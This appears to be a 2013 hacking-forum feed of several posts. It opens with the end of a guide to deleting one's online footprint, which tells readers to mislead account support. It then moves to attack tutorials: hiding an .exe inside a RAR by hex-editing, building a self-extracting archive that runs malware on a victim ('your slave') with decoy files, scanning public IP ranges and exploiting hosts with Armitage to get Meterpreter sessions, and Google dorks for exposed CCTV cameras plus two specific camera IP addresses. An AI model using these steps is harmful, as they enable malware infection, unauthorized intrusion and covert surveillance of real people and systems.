Another thing you need to do, is to look for duplicated images of yourself. Images that you've posted, that someone might have re-posted. Obvious images to check is profile images,
and any other publicly available images. The Google image search is great for this. Go to Google Image Search, drag'n'drop the image to the search field and Google will search for similar images.
This way you can find any sites using your image. You can also add your name, username, email, etc to the search.

It's also important to take notes about whatever you find, and use it when digging even further for information about yourself. This information can also be valuable when trying to recall login credentials.

This process is just like any hacking reconnaissance process really.

Erase yourself
Obviously, you will have to delete your profiles. It might sound very straight forward, but it does take a bit more work than just "cancel account". Since you're trying to erase yourself you need to make
sure that the information is actually gone. To make this happen you need to modify your profile information, delete/replace profile picture, delete any uploaded images and other media that can identify you.
To generate fake profile information I strongly recommend the Fake Name Generator. This provides detailed fake personal data, and a disposable email address that you can use to replace the original one.

If you find some really old accounts that you completely had forgotten, you might find yourself clueless about the user credentials to get authorized. This means you will have to email the support for help on
how to recover your account. Don't say that it's because you're going to delete it. This might result in they doing it for you and you will not get the opportunity to replace the old content with the fake.

When all these profiles are gone it's time to get started on comments you've made. Some comment fields allow you to delete your own comments. In other cases you will have to contact the appropriate people
and ask for them to remove the comments for you. If possible, send the email from the same email as you entered when writing the comment. This way it's easier to verify you as the actual author of the comment.

If you also want to delete yourself from social networks like Facebook and Google+ you must also remember to untag yourself on all pictures, get your friends/followers to remove any tags in pictures,
statuses and comments, etc as well.

You will also have to cancel blogs and personal websites.

On the profiles you want to continue using you will need to modify disclosing content. The level of disclosure is up to yourself. If you're paranoid with tinfoil hat, you will need to remove any information about yourself.
You will have to hide/remove date of birth, age, email, name, any relations such as family and friends, etc. This will also make it harder for people to make you a victim of black mailing.

Order of cancellation
The order you delete your accounts in does not really matter. The only exception is your email accounts which should be the last thing you delete.
The reason for this is that when you delete a profile you will often have to confirm the cancellation by clicking a link that is sent to the primary email address for that profile.
So if you delete this email first you will not be able to confirm the cancellation, and you'll have to start emailing the support which can be along lasting and annoying task.

Final words
As always, I hope you found this helpful and if you have any suggestions or questions please let me know

Dedicated to linuxephus the ghost exe in a rar...?

Wed, 05 Jun 2013 10:58:06 +0000

Hey guys! I am going to show you how to make a "ghost" .exe in a .rar file!

*By ghost file, I mean an invisible file that you cannot see while browsing the .rar file.

Tools you will need:

Winrar --->Click HERE for a download link.

Hex Workshop ---> Click HERE for a download link.

Your Brain ---> I hope you don't need to download this...

Okay, now that you have everything needed, lets start!

Right click on your .exe file, click crete a rar file and compress
Open the .rar you just made and then CTRL+F insede box type .exe to find your file.
When you see the name of your .exe file, go 30 bytes up and find the string t and then change the value 74 to 00 and hit save.
Finally you open your rar and make sure you cannot see your .exe file inside the browser.

My next turotial will be on how execute the ghost .exe and with .lnk
Now you've got homework!
Hug @Linuxephus™

Simple Way To Infect People With RAR Files

Wed, 05 Jun 2013 08:10:11 +0000

This is a simple way of infecting your slave with a virus, trojan, worm, or any kind of malicious code.
All you need is :

The malicious EXE.
Winrar.

You can get winRAR from here : http://www.rarlab.com/download.htm

So, here are the steps :

Install winRAR in your computer.
Right click on your malicious EXE.
Click on "Add to archive".
Tick on "Create SFX archive" checkbox.
Open the "Advanced" tab.
Click on "SFX Options" button.
Open the "General" tab.
A textbox appears with "Run after extraction" written on top.
Type the filename of your malicious EXE like this "server.exe" without quotes.

And you're done!!!
Make your slave extract the rar file that is created in his/her computer.
Make sure your slave has winrar installed in his/her computer.

To make the rar archive less suspicious, you make add some ebooks or pictures or music along with the malicious exe.

Keep infecting!!!
Enjoy hacking!!

Hacking PC With Armitage

Sat, 01 Jun 2013 13:08:18 +0000

Hello, here is Nullerset, for beginning, i wanna say that i am Native Russian, so sorry me if my english is not perfect

So Let`s start

Open Armitage and click "Connect". And Now wait... ( I use armitage in Kali Linux, he is not same with BackTrack`s versions, but it`s not important )

When Open it click "Hosts > Msf Scans > Place the range of scanning IP`s ( or just one IP ); Ranges you can find out there: http://ipdiapazon.16mb.com/ ( It`s on Russian, sorry, but this is the best resource with IP Ranges, every range it`s own range for provider of internet connection )

Okey, now we are scanning the network.

Note: MSF Scan understands ranges 192.168.0.0-192.168.255.255 and 192.168.0.0/24, but nmap understands just 192.168.0.0/24

Warning!! Do not scan very big networks, if you have already started scanning - you will not be able to cancle it, even if you close the window.

I thinked that i canceled scanning, but after that when i get back i had a lot of computers, becouse of my armitage stoped work :|

Ok, and now when we scanned all IP`s, let`s hack it

After it MSF Scans will try to detect OS, if it not detect then try to Hosts > Nmap Scan > Quick Scan ( OS Detect )

Ok, now click Attacks > Find Attacks and Armitage will get all exploit`s wich can exploit the target open ports ( But it shouldn`t be vulnerability to all hosts )

If ports are open, you will see in the meny that opened by clicking "right mouse buttown" "Attacks > [type of exploit] > [Name of exploit] "

Now list this down and you will see "Check Exploits", not all exploits get you opportunity to check them

But if exploit support`s check you will see in the list ( down of Armitage ) the progress of chegking.

If target is vulnerability to some exploit you will see the text "The target is Vulnerability" it`s good! And you`re got some chances to compromise the target

Good, now do not forget the name of exploit and let`s try to exploit.

Click "Right button mouse" on host > Attacks > Exploits and click on name of exploit

You will see the menu with settings of exploit. We are Interested in

LHOST - Your IP

LPORT - Your Open Port
RHOST - Remote Target IP
RPORT - Remote Target Port

Ok, Click Launch and if victim really vulnerability then arround of host you will see red animation

There you see that i saw when hacked my LAN computer :

So click Rigth Button on Mouse and you will see menu with name "Meterpreter". In this menu you will see the functions like as RAT

So, you hacked computer by IP!

Writed by Nu11ers3t
From Moscow

CCTV Hacking Tutorial

Fri, 31 May 2013 08:24:39 +0000

Search this in your Google..
It will give you thousands of unprotected cams.. ^^

Dorks :

Quote:/home/homeJ.html
inurl:/view/viewer_index.shtml
inurl:/view/temp.shtml
inurl:appletvid.html
inurl:"viewerframe?mode="

Just a Sample.. ^^
Riverfront
http://173.190.94.9/CgiStart?page=Single&Language=0

Switzerland Office
http://193.138.213.169/CgiStart?page=Single